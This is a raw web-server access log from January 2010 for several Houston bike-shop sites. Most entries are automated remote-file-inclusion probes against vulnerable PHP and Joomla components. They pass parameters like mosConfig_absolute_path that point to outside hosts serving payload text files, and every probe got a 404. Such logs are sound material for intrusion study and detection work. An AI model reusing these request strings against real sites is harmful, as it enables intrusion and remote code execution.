71.250.232.26 - - [10/Jan/2010:05:54:15 -0800] "GET /logs/access.log/http://www.singharmony.com/about//?_PHPLIB[libdir]=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
71.250.232.26 - - [10/Jan/2010:05:54:15 -0800] "GET /logs/http://www.singharmony.com/about//?_PHPLIB[libdir]=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
217.16.1.22 - - [10/Jan/2010:05:58:49 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
217.16.1.22 - - [10/Jan/2010:05:58:49 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
217.16.1.22 - - [10/Jan/2010:05:58:49 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.44.94.145 - - [10/Jan/2010:05:59:09 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.balipost.com/polling//test.txt?? HTTP/1.1" 404 - "-" "Microsoft Pocket Internet Explorer/0.6" "houstonbikeshop.com"
72.44.94.145 - - [10/Jan/2010:05:59:09 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.balipost.com/polling//test.txt?? HTTP/1.1" 404 - "-" "Microsoft Pocket Internet Explorer/0.6" "houstonbikeshop.com"
190.12.47.130 - - [10/Jan/2010:06:01:00 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
217.16.1.22 - - [10/Jan/2010:06:02:19 -0800] "GET /logs/scripts.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
217.16.1.22 - - [10/Jan/2010:06:02:19 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
217.16.1.22 - - [10/Jan/2010:06:02:19 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
67.195.115.221 - - [10/Jan/2010:06:02:28 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.svbikes.com"
67.195.115.221 - - [10/Jan/2010:06:02:31 -0800] "GET /bullitinboard/viewtopic.php?p=4419 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.svbikes.com"
71.250.232.26 - - [10/Jan/2010:06:03:07 -0800] "GET /logs/access.log/http://www.singharmony.com/about//?_PHPLIB[libdir]=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.125.222.82 - - [10/Jan/2010:06:17:01 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.promisedrealty.com/mortcalcplus/includes/smarty/templates_c/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.125.222.82 - - [10/Jan/2010:06:17:01 -0800] "GET /skin/zero_vote/error.php?dir=http://www.promisedrealty.com/mortcalcplus/includes/smarty/templates_c/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.125.222.82 - - [10/Jan/2010:06:17:01 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.promisedrealty.com/mortcalcplus/includes/smarty/templates_c/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.125.222.82 - - [10/Jan/2010:06:18:55 -0800] "GET /logs/access.log%20%20//login.php?dir=http://www.promisedrealty.com/mortcalcplus/includes/smarty/templates_c/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.125.222.82 - - [10/Jan/2010:06:18:55 -0800] "GET /login.php?dir=http://www.promisedrealty.com/mortcalcplus/includes/smarty/templates_c/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.125.222.82 - - [10/Jan/2010:06:18:55 -0800] "GET /logs//login.php?dir=http://www.promisedrealty.com/mortcalcplus/includes/smarty/templates_c/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.125.222.82 - - [10/Jan/2010:06:25:56 -0800] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.promisedrealty.com/mortcalcplus/includes/smarty/templates_c/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.37.114 - - [10/Jan/2010:06:34:50 -0800] "GET /logs/access_090310.log HTTP/1.0" 200 6047120 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
75.125.222.82 - - [10/Jan/2010:06:36:13 -0800] "GET /logs/access.log//login.php?dir=http://www.promisedrealty.com/mortcalcplus/includes/smarty/templates_c/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
216.129.119.14 - - [10/Jan/2010:06:40:30 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "bicyclestoreshouston.com"
207.191.225.96 - - [10/Jan/2010:06:42:33 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.promisedrealty.com/mortcalcplus/includes/smarty/templates_c/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.191.225.96 - - [10/Jan/2010:06:42:33 -0800] "GET /logs/access.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.promisedrealty.com/mortcalcplus/includes/smarty/templates_c/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.191.225.96 - - [10/Jan/2010:06:42:35 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.promisedrealty.com/mortcalcplus/includes/smarty/templates_c/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
121.254.168.4 - - [10/Jan/2010:06:43:37 -0800] "GET /logs/access.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
121.254.168.4 - - [10/Jan/2010:06:43:37 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
121.254.168.4 - - [10/Jan/2010:06:43:37 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.36.2.101 - - [10/Jan/2010:06:50:55 -0800] "GET /logs//zero_vote/setup.php?dir=http://www.allinclusive.name/indosyris.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
69.36.2.101 - - [10/Jan/2010:06:50:55 -0800] "GET /logs/access.log//zero_vote/setup.php?dir=http://www.allinclusive.name/indosyris.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
69.36.2.101 - - [10/Jan/2010:06:50:55 -0800] "GET /zero_vote/setup.php?dir=http://www.allinclusive.name/indosyris.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
69.36.2.101 - - [10/Jan/2010:06:51:41 -0800] "GET /logs/access.log//zero_vote/setup.php?dir=http://www.allinclusive.name/indosyris.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
69.36.2.101 - - [10/Jan/2010:06:51:41 -0800] "GET /logs//zero_vote/setup.php?dir=http://www.allinclusive.name/indosyris.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
69.36.2.101 - - [10/Jan/2010:06:51:41 -0800] "GET /zero_vote/setup.php?dir=http://www.allinclusive.name/indosyris.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
121.254.168.4 - - [10/Jan/2010:06:52:46 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
121.254.168.4 - - [10/Jan/2010:06:52:46 -0800] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.36.2.101 - - [10/Jan/2010:06:54:44 -0800] "GET /logs/access.log%20//zero_vote/setup.php?dir=http://www.allinclusive.name/indosyris.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
69.36.2.101 - - [10/Jan/2010:06:54:59 -0800] "GET /logs/access.log%20//zero_vote/setup.php?dir=http://www.allinclusive.name/indosyris.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
189.72.62.107 - - [10/Jan/2010:06:55:37 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.johngarzon.com.co/list/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
189.72.62.107 - - [10/Jan/2010:06:55:37 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.johngarzon.com.co/list/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
189.72.62.107 - - [10/Jan/2010:06:55:37 -0800] "GET /logs/access.log//bbs//skin/zero_vote/ask_password.php?dir=http://www.johngarzon.com.co/list/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.80.193.28 - - [10/Jan/2010:06:57:50 -0800] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MSN 9.0; MSNbBBYZ; MSNmen-us; MSNcOTH; MPLUS)" "houstonbikeshop.com"
125.141.91.138 - - [10/Jan/2010:06:58:12 -0800] "GET /logs//administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.o-ta.com.tw//appserv/joh1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [10/Jan/2010:06:58:12 -0800] "GET /administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.o-ta.com.tw//appserv/joh1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [10/Jan/2010:06:58:12 -0800] "GET /logs/access.log%20%20//administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.o-ta.com.tw//appserv/joh1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Jan/2010:07:00:35 -0800] "GET /logs/////skin/ggambo7002_board/comment_modify.php?dir=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Jan/2010:07:00:35 -0800] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Jan/2010:07:00:35 -0800] "GET /logs/access.log%20%20/////skin/ggambo7002_board/comment_modify.php?dir=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Jan/2010:07:02:46 -0800] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Jan/2010:07:02:46 -0800] "GET /logs/////skin/ggambo7002_board/comment_modify.php?dir=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Jan/2010:07:02:46 -0800] "GET /logs/access.log%20%20/////skin/ggambo7002_board/comment_modify.php?dir=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.191.225.96 - - [10/Jan/2010:07:03:44 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.promisedrealty.com/mortcalcplus/includes/smarty/templates_c/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.191.225.96 - - [10/Jan/2010:07:03:44 -0800] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.promisedrealty.com/mortcalcplus/includes/smarty/templates_c/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.191.225.96 - - [10/Jan/2010:07:03:50 -0800] "GET /translations/Portuguese.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.promisedrealty.com/mortcalcplus/includes/smarty/templates_c/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.191.225.96 - - [10/Jan/2010:07:05:11 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.promisedrealty.com/mortcalcplus/includes/smarty/templates_c/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.191.225.96 - - [10/Jan/2010:07:05:11 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.promisedrealty.com/mortcalcplus/includes/smarty/templates_c/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.191.225.96 - - [10/Jan/2010:07:05:11 -0800] "GET /translations/Portuguese.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.promisedrealty.com/mortcalcplus/includes/smarty/templates_c/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.191.225.96 - - [10/Jan/2010:07:05:15 -0800] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.promisedrealty.com/mortcalcplus/includes/smarty/templates_c/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [10/Jan/2010:07:07:25 -0800] "GET /translations//japanese.php?u=http://www.o-ta.com.tw//appserv/joh1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [10/Jan/2010:07:07:25 -0800] "GET /translations/Japanese.txt%20%20//japanese.php?u=http://www.o-ta.com.tw//appserv/joh1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [10/Jan/2010:07:07:25 -0800] "GET /japanese.php?u=http://www.o-ta.com.tw//appserv/joh1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Jan/2010:07:15:11 -0800] "GET /logs/access.log/////skin/ggambo7002_board/comment_modify.php?dir=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
190.12.47.130 - - [10/Jan/2010:07:15:34 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
190.12.47.130 - - [10/Jan/2010:07:15:34 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
190.12.47.130 - - [10/Jan/2010:07:15:34 -0800] "GET /logs/access.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.235.124.1 - - [10/Jan/2010:07:24:46 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.svbikes.com"
66.235.124.1 - - [10/Jan/2010:07:24:46 -0800] "GET /fit.html HTTP/1.1" 200 17443 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.svbikes.com"
67.195.37.114 - - [10/Jan/2010:07:25:51 -0800] "GET /bullitinboard/viewtopic.php?p=15302 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
190.12.47.130 - - [10/Jan/2010:07:25:54 -0800] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
190.12.47.130 - - [10/Jan/2010:07:25:54 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
60.251.165.181 - - [10/Jan/2010:07:27:44 -0800] "GET /logs/http://www.singharmony.com/about//?_PHPLIB[libdir]=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
60.251.165.181 - - [10/Jan/2010:07:27:44 -0800] "GET /logs/access.log%20%20/http://www.singharmony.com/about//?_PHPLIB[libdir]=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
60.251.165.181 - - [10/Jan/2010:07:27:44 -0800] "GET /http://www.singharmony.com/about//?_PHPLIB[libdir]=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.111.183 - - [10/Jan/2010:07:29:52 -0800] "GET /bullitinboard/viewtopic.php?p=4301 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
189.14.103.146 - - [10/Jan/2010:07:30:45 -0800] "GET /logs/access.log%20%20/index.php?c=http://www.tokyozip.com/bbs/DQ_LIBS/include/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
189.14.103.146 - - [10/Jan/2010:07:30:45 -0800] "GET /logs/index.php?c=http://www.tokyozip.com/bbs/DQ_LIBS/include/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
189.14.103.146 - - [10/Jan/2010:07:30:45 -0800] "GET /index.php?c=http://www.tokyozip.com/bbs/DQ_LIBS/include/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.111.183 - - [10/Jan/2010:07:30:58 -0800] "GET /bullitinboard/viewtopic.php?p=4301 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
90.176.234.205 - - [10/Jan/2010:07:32:33 -0800] "GET /index.php?c=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
90.176.234.205 - - [10/Jan/2010:07:32:33 -0800] "GET /logs/access.log%20%20/index.php?c=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
90.176.234.205 - - [10/Jan/2010:07:32:33 -0800] "GET /logs/index.php?c=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
90.176.234.205 - - [10/Jan/2010:07:34:19 -0800] "GET /logs/access.log/index.php?c=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
189.14.103.146 - - [10/Jan/2010:07:37:50 -0800] "GET /logs/access.log/index.php?c=http://www.tokyozip.com/bbs/DQ_LIBS/include/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.170.45.126 - - [10/Jan/2010:07:44:13 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.derivajewels.nl/media/system/js/id.txt??? HTTP/1.0" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
79.170.45.126 - - [10/Jan/2010:07:44:13 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.derivajewels.nl/media/system/js/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
79.170.45.126 - - [10/Jan/2010:07:44:13 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.derivajewels.nl/media/system/js/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
60.251.165.181 - - [10/Jan/2010:07:46:26 -0800] "GET /logs/access.log/http://www.singharmony.com/about//?_PHPLIB[libdir]=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.170.45.126 - - [10/Jan/2010:07:48:12 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.derivajewels.nl/media/system/js/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
79.170.45.126 - - [10/Jan/2010:07:48:12 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.derivajewels.nl/media/system/js/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
79.170.45.126 - - [10/Jan/2010:07:48:12 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.derivajewels.nl/media/system/js/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
79.170.45.126 - - [10/Jan/2010:07:48:13 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.derivajewels.nl/media/system/js/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
79.170.45.126 - - [10/Jan/2010:07:48:13 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.derivajewels.nl/media/system/js/id.txt??? HTTP/1.0" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
79.170.45.126 - - [10/Jan/2010:07:48:13 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.derivajewels.nl/media/system/js/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
79.170.45.126 - - [10/Jan/2010:07:52:32 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wydgaming.com/upload/lane/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "houstonbikeshop.com"
79.170.45.126 - - [10/Jan/2010:07:52:32 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wydgaming.com/upload/lane/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "houstonbikeshop.com"
66.230.225.218 - - [10/Jan/2010:07:53:55 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.campusdni.com//templates/sken/id1(pirates).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.230.225.218 - - [10/Jan/2010:07:53:55 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.campusdni.com//templates/sken/id1(pirates).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.230.225.218 - - [10/Jan/2010:07:53:55 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.campusdni.com//templates/sken/id1(pirates).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.230.225.218 - - [10/Jan/2010:07:54:15 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.campusdni.com//templates/sken/id1(pirates).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.230.225.218 - - [10/Jan/2010:07:54:15 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.campusdni.com//templates/sken/id1(pirates).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.230.225.218 - - [10/Jan/2010:07:54:15 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.campusdni.com//templates/sken/id1(pirates).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.230.225.218 - - [10/Jan/2010:07:54:29 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.campusdni.com//templates/sken/id1(pirates).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.230.225.218 - - [10/Jan/2010:07:54:30 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.campusdni.com//templates/sken/id1(pirates).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.230.225.218 - - [10/Jan/2010:07:54:30 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.campusdni.com//templates/sken/id1(pirates).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.230.225.218 - - [10/Jan/2010:07:55:24 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.campusdni.com//templates/sken/id1(pirates).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.230.225.218 - - [10/Jan/2010:07:55:24 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.campusdni.com//templates/sken/id1(pirates).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.230.225.218 - - [10/Jan/2010:07:55:24 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.campusdni.com//templates/sken/id1(pirates).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
188.93.208.12 - - [10/Jan/2010:08:02:49 -0800] "GET /admin/popup.php?popup=http://www.easyw21099.com/html//components/com_login/id8????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
188.93.208.12 - - [10/Jan/2010:08:02:49 -0800] "GET /translations//admin/popup.php?popup=http://www.easyw21099.com/html//components/com_login/id8????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
190.12.47.130 - - [10/Jan/2010:08:18:45 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
190.12.47.130 - - [10/Jan/2010:08:28:28 -0800] "GET /translations/Polish.txt//tools/send_reminders.php?noSet=0&includedir=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
